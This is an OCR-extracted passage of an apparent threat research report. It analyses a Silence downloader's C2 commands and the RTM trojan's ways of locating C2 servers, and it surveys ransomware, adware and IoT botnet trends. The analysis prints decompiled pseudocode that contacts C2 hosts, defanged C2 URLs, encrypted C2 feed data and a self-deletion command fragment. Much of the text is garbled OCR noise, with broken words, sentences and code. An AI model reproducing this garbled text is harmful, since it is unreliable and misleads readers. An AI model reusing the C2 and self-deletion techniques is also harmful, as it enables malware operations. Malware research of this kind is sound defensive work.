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oreo (=a) // if command_code == 3 


DYoy'ia Kok-lo¥-Valel => ¢-Ye10 hm =10c0) 1111 11- Tae am 
sub_402AEE(handler_data, handler _ 
obj );// download_and_execute_command 


forele (=a. code_3 - 
!\code_4 // if command_code == 


DestroyCommand_ 
sub_402A18(handler_data, handler _ 
fo) oy // set_destroy_command 


code_4 ee meete) ii ite lave mmexerer= 
—— eg 


PCInfo_sub_402CB@ ) (handler_ 
fo) oy ie Yom Gob Rommere)iiliit-Vale! 


mmm Ulatel-yaeW alte mmere)iiiitstate| 


Commands from 
the C2 server 


The loader supports the following commands: 


* new_identity_command 

* nop_command 

- download_and_execute_command 
- set_destroy_command 

* pc_info_command 


The names of the commands correspond to 
the names of the C++ classes inherited from 


the RexmVevemmeteliiliirslalemmersksts) ClQSS. 
The RYeYaVZeleimeveniirclavemmerstsxs) Class contains a 


4-byte field for the command identifier from the 
control server (in the pseudocode above it is 


identified as @fefiiirelakeMliefeyel=)). 


A detailed description of each command Is 
given below. 


at\i eRe (-Vanmmavamereyinireyare!. | iS Command 


is executed if a string converted to an 

integer value was received from the C2 
server. When the downloader receives 

this command, it changes the system's ID 
number, which changes the relative URL 

for communication with the C2 server. For 
example, if the server sends 01337’ string the 
URL for C2 communication in the case of this 


particular system will change to (eqel€s) eas 
minkolado|[.]top/133 
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(ieyeMReFeyniretare). | his command is executed 
if the string is received from the control 


server (jest means ‘is’ in Polish). When the 
downloader receives this command it does 
nothing. 


(efo)iawmey-\e marl aleMm->.<-\elUnm-Mmere)iiitslare|. | iS 


is executed if string (‘ours’ in Polish) 
is received from the C2 server. The 
String Is sent along with the relative URL for 
downloading additional malware. 


When the command is received, the 
downloader performs the following actions: 


downloads data from the received address; 
checks the header of the downloaded data - 
the first 4 bytes should be the header of the 
CAB file (MSCF); 

if the downloaded data has the correct header, 
the downloader saves it as 
AppData\Local\temp.cab} 

extracts the file from the 
archive using the standard 
Windows utility ‘expand. 


If the file is successfully 
extracted, it is launched from the same 


directory. 


Tou el -tone moh vamereliiit-lare).| iS COMmand 


is executed if the string 
‘practically’ in Polish) is received from the C2 


server. When this command is received the 
downloader deletes itself using the following 
CMD command: [epWate tam KoXer- i plok>y cited sm koliPs 


nul & del {self_file_name} 


(oMeT Mev ielars. | his commana is 
executed if the string |efeN mela b mer ayvai 


(‘polygraphic’ in Polish) is received from the C2 
server. When this command is received, the 
downloader collects and sends information 
about the infected system to the C2 server. The 
process Is as follows: 


the downloader sends the output of 


tasklist| commands to 





VAUIS1<1 al od ohm KW -AW-V 0) 0) DY-her- AV mo lor- WAV olen Rahnoe 
txt} 

the downloader packs into 

using the standard Windows utility 
‘makecab; 
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before the next request for command 
from the C2 server (every 3 seconds) 

will be uploaded on to the C2 
Server as fighalgefelUfer-wrer-hamm (nb.6.49) 6-9 FOAL 


minkolado|[.]top/{num}/introduce. Saiectace 


dat) information 


. about infected 
UlarelsyamMar-vemmexe)iirelare. |e downloader code 


system with the 
includes more class for handling a server use of Windows 
command: undefined_commanad. It is used If 


Function 








system utility 


the downloader receives incorrect data from ee eee? 
C2. The attackers named this class with a typo, Uploading 
Clare t-sawMaler-temmere)iiiirsvare| of additional 
malware 
Self-deletion 
Attribution of the 
Additional 


new downloader 


commands from 
the C2 server 


The downloader we analysed combines the 
features of the Silence main module and the 
previous downloader, known as TrueBot. 


Namely, the following attributes are similar to the 
main module: 


the practice of assigning identifiers to 
infected users; 


the method of obtaining imported functions 
and decrypted strings. 


The comparison of the new loader with TrueBot 
is shown below. 


TrueBot 


tasklist, 
ipconfig, 
hostname, 
qwinsta, and 
others 


In the form of 
encrypted data 


Available 


DEL 
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The new 
Silence 
downloader 


tasklist, ipconfig, 
hostname, 
netstat -na, 
whoami, 
systeminfo 


In the form of 
CAB-archive 


Available 


Integer value, jest, 
nasz, praktycznie, 
poligraficznym 
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governments. 


Now organisations are threatened even 
by the types of malware that traditionally 
targeted users, for example adware which 
displays advertising intrusively. 


Over the past year and a half, however, 
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and healthcare. Today, malware of this 
kind, which encrypt Tiles on a victim's 
computer and then encrypts a ransom for 
the decryption key, participate in targeted 
attacks with complex tactics and deep 
penetration Into the victim’s network. 
Hence, ransomware IS a Major topic of this 
chapter. 
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when the world was swept up by the epidemic 2 
of attacks involving the WannaCry and 5 9 
NotPetya families. These massive infections a m 
paralysed thousands of organisations around g* 
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of mass attacks involving ransomware has 
declined.’ Today, attackers using encrypted 
malware are much more selective: their attacks nv 
are directed at specific organisations, from 6 = 
which they expect to receive substantially 2 7 
bigger ransom. a 
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Over the last 18 months, ransomware attacks 
have become more destructive. Attackers 
began to meddle in not only the IT 

processes of the target companies, but also 
in the operation of their physical facilities (for 
example, various types of machinery). This 

[Sel di dlerc] info) ant alessxomvs(e1l] aalomelin e-lalsve)aa\iVicl as 
whose activities are based on the hardware 
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Another important trend: attackers began to 
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access to the victim's network, attackers 

are not in a hurry to launch the ransomweare. 
Instead, they studying on exploring the 
infrastructure, looking for its vulnerabilities, 

el ale melisy-10)|1ale fc lsmantcla\vyae(=1k-lalexcmaalcreralclalciaars 
as possible. No sooner than when they get to 
the key systems in the network, the criminals 
launch their ransomware. As a result, the attack 
hits the organisation harder which gives the 
attackers a chance to leverage a higher ransom 
for decrypting the files.° 


The more advanced the attacks get, the more 
money they demand. According to one of the 
estimates, the average amount of ransom in 
2019 reached $5.9 thousand, 37% increase 
versus the average in 2018.4 


3. Ransomware against the machine: how adversaries are 
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and OT // FireEye. 


“Tau DY 1GCO RSMO] (0)0Yo] R1E-1CcMO)MNAl=Me1atolala\clmeclalsve)aa\Wiclaomt-lelelaass 
Delaney 


Cybersecurity Cybersecurity maturity => <-Yo1U ha hVA=) 


Attacks 
o) ale of-1 a) 4 


Ww 
Cc 
Oo 
~ 
Yo 
oO 
oc 
Y 0 
~ 
q 0 
Oo 
Cc 
Oo 


(Or-TamYelem-i1t-lale Attacks 
ova laxelbvsreler-lis 


yNeyeluls 
3140) NI = 


across industries lelaalaal-lavg 


figures 





Tor-] | al-imr- i at-Lel <= ara 


THREAT ZONE Threat research ele 


yiey ie) 


Executive 
summary 


Cybersecurity maturity 
across industries 


(©) [o Revo 10 r- 1a k=) aexoss 
atom aalaalelaliay, 


Mass WannaCry and NotPetya ransomware 
attacks occurred in spring 2017. Since then, 
many vulnerabilities exploited by ransomware 
that the developers have been patched, and 
protection measures against old threats have 
been worked out. 
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the cost of being sloppy with the basic rules 
of cybersecurity. 


Three years later, this malware family reminds 
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This story began in March 2017. That was when g 2 
Microsoft released an update that patched O 
a serious vulnerability in the implementation 
of one of the network protocols. The 
(ore) an] ey-la\ a l(cx-laalcie ma] 0(el0lmdat-me)ce)e)(-leamirelan 
the US National Security Agency, where a tool 
exploiting this vulnerability had been known as re 
EternalBlue. Microsoft classified the patch as rs c 
oli ders] pure] ale Mim e\-\er-la nlm aalcialel-ice)avalelarel|mals\y 2 7 
versions of Windows. 
attempted WannaCry BAVoW aateyallatsel-ic-lm(-lalswevintalelelsv-lalels 
Talk=yeus (elal=m a=) ele) an-re| of computers in 70 countries were hit by 
faare)aldal has WannaCry malware, which used none other 


than EternalBlue to spread across the network 
of targeted organisations. 


Before the threat could be stopped, the number 
of infected systems reached 200 thousand, 
and geography of the attack expanded to 
sFol@Korolelaiiaiocwy-\anlelalemialmulelllaaom circu elelia 
corporations and governmental agencies, 
including the UK National Health Service. 
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After such a massive attack, one would expect v2 
almost all computers to get protection against Q 2 
EternalBlue, which was as simple as updating qc 
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to spread WannaCry via already infected 
computers were detected. This means that the 
nlelanle\=1eeliere)an)olei(clececitl | malolme)gel(-\elt-\emice)an x 
EternalBlue is quite alarming. In other words, Fs b 
Windows OS has not been updated on such o - 
computers since at least March 2017. g 2 
> 
Given the circumstances, It is by sheer luck that 7 
no second WannaCry epidemic has occured 
yet. The versions of malware circulating 
currently on the Internet are mostly modified 
So that they infect devices without encrypting 
files. gx 
ao 
So far, the unlearned lesson has not cost as 3 7 
1e) 


much as it did three years ago. But this does 
not always happen, as the example of another 
old acquaintance goes, the Ryuk ransomware. 
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Ryuk: a hybrid 
lmalastele 


From the very beginning, the operators of 
RAVLUL @EcIAISTO)AAIWIcIKcHMIIESIEO | O)V.c1f<10 ANU Te] EISII 
2018, made targeted attacks on corporate 
networks and demanded large amounts from 
their victims. For the first five months of the 
malware's existence, its creators earned in 
total more than $3.7 million. Ryuk was also 
used in a ransomware attack with the largest 
olclantelalel-\oM ane)my40hbonm-lanelelaluialemtencn Make 
million.? 


What is so special about Ryuk is that it clearly 
illustrates cybercriminals tendency to 
collaborate. This ransomweare is distributed 
with the use of Emotet and Trickbot, the 
ie) aa alcimey=]al.<ialemine)[-larcmialim=)<ey-lale(cremealclla 
functionality in the second half of the past 
decade to deliver other malware (we discussed 
this in more detail in Threat Zone 2019). 


Aialismicr-lemclamoyclanle)omelix-lanclatcle.@vviiemialis 
vector was the infection of the corporate 
network of Epig Global, a big law firm. 

The infection paralysed the operations of all 80 
[olere] o)ailexcrow-]c@l0/alemialom ie) alen 


Ei atcmerclUls\oue)intaloulalel(e(-ialm\\r-\smlala(crralerere) ge] lale 
to anonymous sources in the media: 

many computers in Epig ran older versions 
of Windows."?:" 


8. Big game hunting with Ryuk: another lucrative targeted 
ransomware // CrowdStrike. 


9. 2020 global threat report // CrowdStrike. 
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activity on systems // LawSites. 
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attack // TechCrunch. 
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New threats: 
ofolule)(=mel-laar-1e[= 


In 2019, several new families of ransomware 
emerged. We are going to focus on the two 
which demonstrate new approaches used 
by developers and operators of ransomware. 


Meolei.<=14@le\el-) 
in-depth attacks 


LockerGoga malware attracted attention at 
the end of January 2019 with its debut attack 
on the French company Altran Technologies, a 
(e}fe)ey= 1 mlalarenz-ldlelamlalemcralel|arcicislalemexe)aisielidiare 
firm. The company did not disclose any details 
of the only saying that the attackers had used 
relay econ lele).<cmyla0isiins 


The incident with the Norwegian company 
Norsk Hydro, one of the largest aluminium 
producers in the world, shed light on the specific 
tactics used by LockerGoga operators." ' 

The victim company disclosed the details of 

the attack — they even gave a description of the 
attackers actions — so we have a chance to 
evaluate from the outside perspective, how the 
ransomware attacks became more and more 
targeted. 


13. Update on the cyber attack // Altran. 
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attack // Reuters. 
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double attack on Hydro] // NRK Norge. 
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The attackers had infiltrated the Norsk Hydro 
network a few months before the ransomware 
was launched. The method of infiltration was 
a phishing email: the malware was attached 
to the email sent on behalf of an actual Norsk 
Hydro client and signed with a valid certificate. 


Having gained access to the network, the 
hackers compromised Active Directory, a 
Windows OS service responsible for user 
authorisation and network resources access 
ore) alice) 


This gave the attackers full access to the 
company's infrastructure. Only then they 
GliSidglolultcromuaioueclarnelaa\\i-lccmealcelelelarelelmtals 
organisation and ran it." 
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17. Ransomware costs double in Q4 as Ryuk 
Sodinokibi proliferate // Coveware. 
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The ransomware paralysed systems that 
assisted business process and production 
chains management. As a result, most of 
the facilities owned by Norsk Hydro were 

Ife) cexsre COs) 1/1 (eam Kom pal-l0lel-]me)el=ie-10(e)arsmaniele(=s 
Several aluminium processing factories even 
Suspended operations entirely.'® '? 


PN oy- 1am ice)aamta|ae[-1lalepulalcuclatc(el.<cmlanve) Niele 
LockerGoga are distinguished by their 
implementation of social engineering tactics. 


Typically, ransomware generate a text message 
with a bitcoin address and the required amount 
of ransom. 


LockerGoga provides only the contact details 
of the attackers and encourages the victim 

to discuss the conditions for decrypting files 
by email. The attackers’ message says that 
idalom gol a\se)aaie-|an(ele|almel=10l-1alelsme)amare) im e)celanlelen, 
the victim contacts them.” 


18. Ransomware against the machine: how adversaries are 
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and OT // FireEye. 

19. Cyber-attack on Hydro // Hydro. 


20. New LockerGoga ransomware allegedly used in Altran 
attack // Bleeping Computer. 
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Creators of Sodinokibi, which was discovered 
in April 2019, were the first ransomware 
developers to set up monetisation with the use 
of RaaS model (Ransomware as a Service). 


Ni alismaatelel=imal=i| e\smiencr-leamaalelal-aaeaicelelelamelialcis 
attackers. In particular, Sodinokibi is distributed 
am=>.<oval<|alelsmce)ar-sja\- Ik ROlmalom=rlanlialels 
generated from successful cyberattacks. 

For the first eight months of the ransomware’s 
existence, its developers engaged 39 such Over 
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The RaaS model could be a massive threat. This 
is clearly demonstrated by the number of the 


attacks accomplished with the use of Sodinokibi: 


in the fourth quarter of 2019 the malware was 
involved in every third incident associated with 
ransomware (29%).72 


The malware developers themselves engage 
in attacks as well. Such attacks are truly 
Surprising by the method chosen for the actual 
yale la tlelamelmaalelatc\Z 


Last December, the Sodinokibi developers 
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the Internet if it failed to pay the ransom.’ 
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The attackers launched a special website where 
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Artech Information Systems, one of the largest 
-Naat-ia(erslau cere aeliaialemalanatcns)e\-reiiciiii/alemlamealcu ne 
industry.” 


In May 2020, Sodinokibi hackers accessed 
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with some of the world’s best-known celebrities. 


sMat-moidinaliarlisne(-laarelale(-\en-mcVAlmanlli(elaneclarselen 
in exchange for the stolen files. This amount 
was doubled after the firm refused to pay. At 
dato tlaalome)mcalisml\Zalelalepmlalomel-leleMalciomiciicrelsicre 
a batch of documents related to the singer 
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NW/FeTe lo) alate kswe (cl > Peas 


22. Ransomware costs double in Q4 as Ryuk, Sodinokibi 
proliferate // Coveware. 


Vie War Nelo) alien f-lalsxe aa ielaom ll male\ Wm elele)iisiamvsleitiaalsimer-ltcMimareyl 
oY lle/mnlia1=1 0) [ale m@xe)aalelulicie 

24. Sodinokibi ransomware publishes stolen data for the first 
dianl-w/m=i(=\-1e)iale mexe)anleleit=ie 


25. Buhtrap group uses zero-day in latest espionage campaigns 
// WeLiveSecurity by ESET. 
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more diverse digital threats than a year before. o - 
In this section, we will cover new factors you 9 2 
have to consider while developing security st 
policies, as well as shine light on those known 
attacks with significantly increased risk. 
88 
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Adware, riskware, 
hacktool: from users 
to business 


Last year we reported on a shift in attacks 
from targeting particular users to targeting 
(o)gefelalisyoldle)alsymsssye1c1@ltcl| mere aalaaliceltc] 
companies. This trend has indeed got worse. 


Attacks 
on organisations 


aN alcmalacimel(srslmiale|lercice/mevmualiomicw: (elk 


or advertising malware. a ® 
iy WY) 
4 x 0 
This class includes malware which displays on e 2 
unwanted advertisements. Commonly, it is ——— qo 
(olo)atome)ymevar-lale]ialemeal-maleanioney-le[-melmel-iiclelie 2 _ O 
search engine in a web browser. = vie" 
~ - ] 
Neo Wieimtisyialem aalelNiicleomiaclelite)arclinvmeelaelcit : = 7 a 
individuals, but last year they began appearing 3 ° SW C: 
frequently in corporate networks. In 2019, the - E x 
nlelanlel=1me)m-lar-le1. <ome)ake)gel-laliccltlelacmiiitamtals - 7 e 
use of adware increased 5% times (+463%). os 
‘ © 
“uz 
8Q 
ti 


The second example of a significant increase is 
demonstrated in the attacks using the so-called 
riskware. 


aalismeiclssome)mtalccrclecmarelUlelorom (ciel idl aarei 
software, which, in the hands of an attacker, 
can harm the target system. A typical example 
of riskware is any software for remote 

control (like TeamViewer or UltraVNC). In your 
company such programmes can be used, for 
example, by system administrators to configure 
workstations, but if attackers manage to install 
such a programme or if they get access to it on 
a compromised system, they will be able to fully 
(oxo) alice) mualomlalicreitcremaar-leallarce 


The number of attacks using riskware increased 
for organisations by 52% in 2019 versus 2018. 
ai a\cualelanlecoimelmcieleam-lar-le1.<onelamlalelhVlelelclismalcis 
decreased by 35%. 


mlarcliNAMIGl SMe) atamaalslale(eallalemal-lccmtgiomclelge|< 

of attacks which use tools for penetration 
testing, a cyberattack simulation done by 

a legitimate actor to find vulnerabilities. 

Such software Is designed to emulate the 
actions of an attacker. Among these tools are 
password cracking tools, malware obfuscators, 
known vulnerabilities exploits, etc. 


Last year, cybercriminals used such software 
to attack organisations at three times the rate 
compared to the numbers from 2018 (+224%).?° 


26. 2020 state of malware report // Malwarebytes. 


A single successful attack on a particular 
organisation is more fruitful than successful 
attacks on dozens of thousands of users. 
Stolen data enables the cyber criminals to earn 
more money, and compromised resources help 
(ofeliamanle)comere)aa|eleiiiale mers] ey-lel1a\ay-\eere) ae] |ale mle 
the statistics available on adware and riskware, 
it seems that more and more malware 
developers and operators are beginning to 
or-lCoanelamtenialicmicieie 
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tafe 
c 
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(o)alome)imtalomanlescia ©)ce)e)(-/aal-ltlenlam-leaaisne)i : a D 
cybersecurity. 7 Q* 
©; 
Any potential vulnerabilities of routers, E "" 
surveillance cameras, smart kettles, light bulbs, i 
F = 
robotic vacuum cleaners and other household - 
appliances in mass production are always the e a 
last to get any consideration — if any at all. = g 
Cc 
Aialismismal=)|e)i0]mie)ar-larcle..<clecmwialen ar-\\iom(elale) a 
been exploiting vulnerable loT devices when 6 






creating botnets which are made up of devices 
(of) alice) |(=xem emt alomclatc(e1.<olecmmer-lialciecre MIL Comercio 

loT devices are engaged in DDoS attacks on 
corporate networks. 


Attacks 
on organisations 






(OF-Tanele e-in-lale, Attacks 
against a hacker? ovamiareihvuleLer-liss 
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The situation is aggravated by the significant 
size and growth rate of the Internet of Things. 
Reality has outpaced the prediction of experts: 
analysts believed that by the end of 2019, there 
would be 8.3 billion loT devices connected 

to the network, the number ended up being 

alle |atciqmemon @)]||(¢]aMmmalouale|an]e\-melar-[ellhicm@l-a[ercrs 
will most likely exceed the latest predictions 
for 2021 which were made two years ago. 
Back then, experts estimated this figure at 11.6 
billion.2’ 


The increase in the loT market is directly 
proportional to the scale of threat posed by loT 
botnets. 


mOlMUaloMilecimsi) qanlealialsmelmyAGnommialcualulan|eleis 
of attacks on honeypot-servers reached 
zliaalessimon ©)|1 |e NAloMismemon llaaicsmaale)comiarcla 
in the second half of 2018. 


Most likely, such figure would have been 
impossible without the contribution of loT 
devices. Several facts point to this. 


Firstly, almost half of the malicious connections 
(1.4 billion) were recorded on the ports used by 
Telnet and SSDP. The former is now relevant 
mainly for loT devices. The latter is often used 
for DDoS attacks using loT botnets. 


Secondly, most of the attacks on honeypot 
servers involved malware from the Mirai family, 
one of the main lol malware, which accounts 
for 16-21% of loT related incidents.*8 


Finally, for the same first six months of 2019, 
there was a report on an abnormal increase 
(55%) in compromised loT devices.”° 





2 







lol 2019 in review: the 10 most relevant lol developments 
of the year // loT Analytics. 


28. Attack landscape H1 2019 // F-Secure. 


29. SonicWall 2019 report: 55% rise in lol. malware attacks 
Open Access Government. 
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DoS (Denial of Service) is an 
attack in which the target server 
or service is overloaded with 
requests to such an extent that it 
becomes inaccessible to the user. 





DDoS (Distributed Denial of 
Service) is a type of DoS attack 
TavidrelccromUlsiiave Rem malele(-malelanlel=is 
of devices with different IP 
addresses. 


Honeypot servers are systems 
ldatclimelccomlauccialele)arelimaarelels 
vulnerable to lure the attackers 
reTale mere) |(c\e1mer=ltc-] ele lel mual-limlelels 
relalemaatcitalelelse 
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attacks were recorded 
‘o) as ate) a\=\\/ 010) =.=) AV. =) 6m 


Cybersecurity Cybersecurity maturity Executive 


Attacks 
o) ale ef-1 a) 4 


Ww 
Cc 
no) 
~ 
Yo 
oO 
oc 
Y O 
7) 
q 0 
Oo 
Cc 
Oo 


Attacks 
ola are lavare ler-) is 


(Or-TamVelem-i1t-lale 


Yor-1 i a\=imr- ls at-[el.<-) ate 


pNeyelels 
3140) Ni = 


across industries Jelaalaal-lav4 


figures 





iRalcesiaereiaela 
la deissie 


In addition to the above said, banking trojans 
claarellammsilelalinlerlalantalcorsimconerelanley-lal(oom laments 
Russian cyberspace. Disguised as legitimate 
Tiles, trojans breach a target system and allow 
cybercriminals to gain access to victims’ bank 
accounts. 


A typical attack with this class of malware goes 
as follows. 


An employee of a company receives an email 
with a Microsoft Word document attached, 
which allegedly contains a contract, urgent 
Ta\viellexsrsyrs mere)aa)aal=1celt=]me)n(=1 me) ar-maleliialerciilela 
from a government body. 


In fact, the file contains macros (software 
algorithms) written by the attackers. Microsoft 
Office macros help automate routine tasks, but 
cybercriminals use them to initiate actions that 
Felelateamaarclclice 


Maou aatcl\iiclcomere)alarcveltsmcomual-mere)aalaalelalets 
and-control (C2) server and starts receiving 
lolol deere] miclaleidlelatclmanlelelelisswelalemeroaalaarclarels 
from the attackers. 


The attackers proceed to steal money using 
dalcmexe)aiege@)|(<10m aaleINi\icl komm MAIISMISMUISIUT-]I\Vmele) alc 
oN mantclal]eleltclelale pel @mr-lerere)6] alti aleme)celele-laalaat=s 
idatolarel acme] e]i(omere)an|aale)amlamncelsss)i-la mee) ae] ey-] allay 
The malware replaces a legitimate recipient's 
details in payment orders with those used 

by the adversary. 


t 


Since 2014, such attacks have mostly been 
carried out using three programmes: Buhtrap, 
RTM and Dimnie. The activity of Dimnie 
decreased in 2019 and 2020, but the other two 
Stay relevant. 


Buhtrap has started being utilized as a spyware. 
That way, it has been used in attacks against 
government organisations. This was observed 
[aeelela\cwA@N bom lamualcusy-laelomer-laaley-|(elanmtal= 
malware exploited a ‘zero-day vulnerability’, 
which is also not so typical of a banking trojan.°° 





30. SonicWall 2019 report: 55% rise in lol malware 
attacks // Open Access Government. 
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RTM, an ironic acronym for Read the Manual, 
continues to target companies. The malware's 
activity has been growing: in Q1 2020, we found 
twice (108%) as many unique executable 

RTM files compared to the same period last 
year. Usually, the difference between these 
executable files is insignificant, but some 
samples showcase a new phase of RTM 
evolution. 


One of the key directions for the trojan’s 
development is associated with connections 
to C2 servers. To achieve the objectives, 
esmlanlele)ar-lalmie)mlalce-latclel<cecmlonantclialtclia 

a Stable connection with the infected 
computers. Therefore, they hide the addresses 
of the servers and regularly change the ways 
that the malware finds these addresses. 


Some of the new approaches can be 
Surprisingly inventive. In the next section, 

we will look at some of them and see how they 
have changed in different versions of RTM. 
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RTM: search for 


C2? servers 


RTM prefers to transmit the C2 server 
address so that the IP could be dynamically 
changed without modifying the malware's 
source Code. 


On the one hand, this makes things easier for 
attackers and can throw analysts off their trail. 
On the other hand, it allows experts to predict 
the addresses of command-and-control 
servers before another campaign. 


Since the trojan appeared, we have observed 
four ways it receives IP addresses of the C2 
servers. 


2015-2016: RSS 


The first versions of RTM used an RSS feed 
to update addresses of the command-and- 
control servers. 


Attackers would create LiveJournal blogs 
containing encrypted C2 addresses. To get 
the C2 addresses, RTM would send a request 
weahxxps://<blog_name>.livejournal|[.] 


oro VACk-he-Pamsisya NC process the response. 





An example below is the response from 
hxxps://f72bba81c921.livejournal|.] 





com/data/rss 


RSS feed content. The description field 
contains encrypted addresses of the 
command-and-control servers 


<rss version='2.0"> 


<channel> 


<title>f72bba81c921</title> 





<link>https://f72bba81c921.livejournal. 
com/</link> 


<description>f72bba81c921 - LiveJournal. 
com</description> 


<lastBuildDate>Thu, 05 Nov 2015 02:32:20 
GMT</lastBuildDate> 


<generator>LiveJournal / LiveJournal. 
com</generator> 


<1j : journal>f72bba81c921</1j : journal> 


<1j :journalid>77015555</1j :journalid> 


<l1j :journaltype>personal</ 
1j:journaltype> 


<item> 


<guid isPermaLink="true’>https:// 
f72bba81c921.livejournal.com/627.html</ 
(of URe be 


<pubDate>Thu, @5 Nov 2015 @2:32:2@ GMT</ 
pubDate> 


<title>1</title> 
<author>f72bba81c921</author> 


<link>https://f72bba81c921.livejournal. 
com/627 .html</link> 


<description> 


[40 ]1b05e4a4d3709f 1eaaGaddba2b981868c8ad 
5b3c6a0a7/1090eed48982ab4727035f4b0b23 F44 
69e11ed1109f5b1124985a6e9ee8e662dFf21c6d5 
93a9a960[/40]<br /> 


<br />[41]9e7780b8c0a641edb710d52dfOb80b 
9997a74b3c5fdab8cd5da6775a9 Ff b9bFf 13883711 
F16427c0474793c152798e4280a620594a03ccOfc 
15d796b2584585[ /41]<br /> 


<br />[30]8278fcdcb4694799680f251 faf0658 
smcTats] 4l0[oneKorel oX=Xel-Joletehelolololeetole si me WAole(-ts12) olor Tem As) 
e771cfae94fbb6a8ce0ea3becd2e9087e5al 8353 
LV -\°F-¥- WA owas] o¥-1:10) WAL /> 


<br />[1]9efc@8e5bd3e58df11b6dc74a5021 8d 
0374494c32b15445093d11c82e1960f12ae68462 
19aaf3afOdabdd8b6b5a6df37748c47b9c268a0T 
ol ldo) ee 


<br />[60]2b026e46792db1bb6f90e4ec774c13 
659c057b13181122328f340db23a2978e5777d3a 
92773a86ce5f347b909e95a79F4b562da7a9450a 
34029f[/60]<br /> 


<br />[42]bff@b4cf5a9da230b5db8650ae371a 
297fd10b06f09494533dad576eb1e60047af1230 
(eM smeKelerodclelel-\-a-WAstou mi Motolo 2-0-6 ke lok-\on mm im Ae (-M Ron me) 
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a3d@d8efbeeG@94[/42]<br /> 


<br />[43]7f54460724363cd9ba7efb9b4340Ff3 
€122107839d73c0023ef 508afe2232b0e991a294 
d2894eb4dd3c986c2f52984337f84aa7fcae3d3a 
edd0@0a58792b82[/43]<br /> 


<br />[56]cd@c24857167077f652a2a654e323¢c 
ef5d212de3c7fe0fb806b58c02a87eb3 7c0ab68eFf 
f6aa7af0276e55e040efC67C72852cb99059a7d0 
0e380587a6561c[/56]<br /> 


<br />[57]456ceb4f3b31c84aa3 f06b41c44d60 
d37d855250a840114843cbd9dd6f 8e34e82e3ad9 
C242405560a411636afabf043ce877351157b/ad 
9fb46298e04fde[/57]<br /> 


<br />[58]54a007ec6ab22c8d3a4608aGabd7bf 
700652c483b16152e33d11051362e28ddb07cc3a 
47ae718b61f93198b59969b7467F9945e55ce1bd 


e2e0cee4fc4a626[/58]<br /> 


<br />[59]c82e1e269ae245ca14545d22b4c693 
Aebf f53888df8d93bf54dc5de0e369ddae03c78a 
c1e804960d2942fe9e41104aa852a55cfCc88354e3 
4987f98ca6b019[ /59] 


</description> 
<comments> 


https://f72bba81c921.livejournal. 
com/627.html#comments 


</comments> 

<l1j :security>public</1j:security> 
<1j:reply-count>@</1j:reply-count> 
</item> 


</channel> 


The decrypted strings with the default 
C2 address and the RSS feed address. 
The data was obtained during malware's 
execution 


offset aGet ; “GET” 
offset aPost ; “POST” 
offset aHttp11 ; “HITP/1.1” 


offset aMozilla5@Compa ; “Mozilla/5.@ 
(compatible; MSIE 9.0; Wind”... 


offset aAcceptTextHtml_@ ; “Accept: 
text/html, application/xhtml+xm”... 


offset aAcceptTextHtml ; “Accept: 
text/html, application/xhtml+xm”... 


offset aWebstatisticao ; 
“webstatisticaonline.tech/r/z.php” 


(o} i 1-0 >| Oa ed ©) nA ©) OY - 1 oi Rok’ EO Oa 
f72bba81c921.livejournal.com/dat”... 


(o) i S10 = LX OM 00) DZ SEE i a 
(os = 0 ~ | Dh Oe GO 2 oO 
offset aDtt ; “.dtt” 


“ ny 


(o} i 1-0 Ls) 8] ORES] O1@ 
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2016-2019: 


In March 2016, RTM started using 
domains for C2 servers’ addresses. 


These domains are supported by Namecoin, 
an alternative DNS registrar based on 

the blockchain technology. The system 

is decentralised, which makes domains 
difficult to block. 


IP addresses of the C2 servers on Hjesme were 
received by RTM in one of two ways: 


* via the Namecoin block explorer’s API: 
* through domain name resolution using 
special DNS servers. 


Function for getting C2 addresses via .bit 
domains 


asciil_cc_ptr = @; 

= a3; 
ip_address = ip_res; 
wide_cc_ptr = cc_address_prt; 
v9 = &savedregs; 
v8 = &loc_41210F ; 
v7 = __readfsdword(@) ; 
__writefsdword(@, &v7); 


res = GetIPAddress_NamecoinAPI_ 
sub_411BF@(cc_address_prt, ip_res, a3); 


( !res ) 


LStrFromWStr(&ascii_cc_ptr, wide_cc_ 
ptr) ; 
( !GetDnsImports_sub_41201C(res) 


|| (res = GetIPAddress_DnsResolve_ 
sub_411E4C(ascii_cc_ptr, ip_ 
address, v3), !res) ) 


res = gethostbyname_ 
sub_411D9@(ascii_cc_ptr, ip_ 
address) ; 


Method 1: via the Namecoin block explorer’s 
API. In this case, RTM sends a request to 


hxxps://namecoin.cyphrs[.]com/api/ 


afcliilsmmesialel PAeWesateliitseeand extracts the |P 


address of the C2 server from the body of 
response page. 
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Notably, RTM gets two IP addresses at once: 
if one is unavailable, the malware contacts 
the second one without repeating the entire 
request procedure. 


Let us look at how the function for receiving C2 


addresses works with the RalehummexelU aiu-) evan 
domain. 


Function for receiving IP addresses of 
the C2 servers via the Namecoin block 
explorer’s API 


url = @; 

name_ptr = @; 

data = @; 

v18 = a3; 

v3 = a2; 

cc_address_ptr = cc_ptr; 
v12 = &savedregs; 

v11 = &loc_411D7E; 

v1@ = __readfsdword(@) ; 
__writefsdword(@, &v1@); 
LStrClr(a2) ; 
LStrClr(v18) ; 


GetName_sub_411BA@(cc_address_ptr, 
&name_ptr);// stat-counter-7.bit 


SS oa ol Of- 0 C10) all On wD -You m\2 oh ot -Te]| WRoL-Son ol a Male fcee 
>api_name_show_d, name_ptr) ; 


// name_ptr value: /api/name_show/d/ 


// url value: namecoin.cyphrs.com/api/ 
name_show/d/stat-counter-7 


v5 = HttpRequest_sub_4@DC88(ofDecryptedW 
ideStrings->namecoin_cyphrs_com, url, @, 
Q@, 443, 2, 0, 8, &data_struct) != @; 


( v5 ) 


LStrFromPCharLen(&data, v17, data_ 
struct) ; 


index = LStrPos(ascii->alIp, data) ; 
// ip\” a 


( index ) 


GetStr_sub_4035E8(&data, 1, (index 
+ 7)); 


v7 = LStrPos(ascii->slash, data) ; 
// \" 


( v7 ) 
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LStrCopy(v3) ; 


GetStr_sub_4035E8(&data, 1, (v7 
+ 1)); 


v5 = sub_40E2C4(*v3, @) ; 


v8 = LStrPos(ascii->_slash, 
data) ;// ,\” 


( v8 ) 


GetStr_sub_4035E8(&data, 1, 
(v8 + 2)); 


( LStrPos(ascii->slash, 
oF hor- 


LStrCopy(v18) ; 





As part of this method, attackers used requests 


not only to GROdekSeaay-liiteveres Aaron do) al acy ie 
oLe) VA) WART-LSMSIAOL PACH, OUT alSo to 


aod cee sdareliitcvelat-l me eaabaareliteyaera — in this 
case, RTM processed the ‘Current value field. 





Summary 


Operations 
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Method 2: via domain name resolution. . 
ip_dword_2 = (*of_inet_addr) (ip_ 


Attackers used this method if they failed to str_3); > 
